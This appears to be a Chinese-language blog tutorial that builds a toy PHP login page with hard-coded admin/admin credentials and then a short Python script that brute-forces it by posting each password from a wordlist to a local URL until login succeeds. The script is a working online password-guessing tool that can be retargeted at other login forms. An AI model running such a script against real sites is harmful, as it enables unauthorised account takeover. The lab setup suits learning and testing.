Home >  > 5分钟写一个暴力破解PHP登陆表单

5分钟写一个暴力破解PHP登陆表单

0

一、创建php文件
首先要新建一个PHP登陆表单页面用来测试,样式如下:
Snap325

代码如下:

<!DOCTYPE html>
<html>
<head>
	<title>Testing Script Brute Force in Python</title>
	<meta charset="utf-8">
</head>
<body>

	<?php
		if(isset($_POST['sub'])){

			$input1 = $_POST['input1'];
			$input2 = $_POST['input2'];

			if ( $input1 == "admin" and $input2 == "admin"){
				echo "Login success!";
	    	}else{
				echo "login failed!";
			}
		}
	?>

	<form method="POST">
		Username:<input type="text" name="input1">
		Password:<input type="text" name="input2">
		<input type="submit" name="sub">
	</form>
</body>
</html>

二、测试

通过工具找出Form的字段,这里需要用到toggle httpFox插件,这是一款非常好用的Firefox插件,不过由于我的firefox版本太高,并不支持。

Snap327

三、编写Python代码

# Author  = 蜗牛博客
# Blog    = www.snailtoday.com

import requests

url = 'http://127.0.0.1/form.php'
arq = open('password.txt','r').readlines()

for line in arq:
    password = line.strip()
    http = requests.post(url,data={'input1':'admin','input2':password,'sub':'submit'})
    content = http.content

    if b"Login success!" in content:
        print ("=========[+] PASSWORD CRACKED:"+password+"=======")
        break
    else:
        print ("[-] Password invalid:" + password )

运行时出现a bytes-like object is required, not 'str' 的错误提示,将if "Login success!" in content改成if b"Login success!" in content,问题解决。
Snap326

原载:蜗牛博客
网址:http://www.snailtoday.com
尊重版权,转载时务必以链接形式注明作者和原始出处及本声明。

本文暂无标签

发表评论

*

*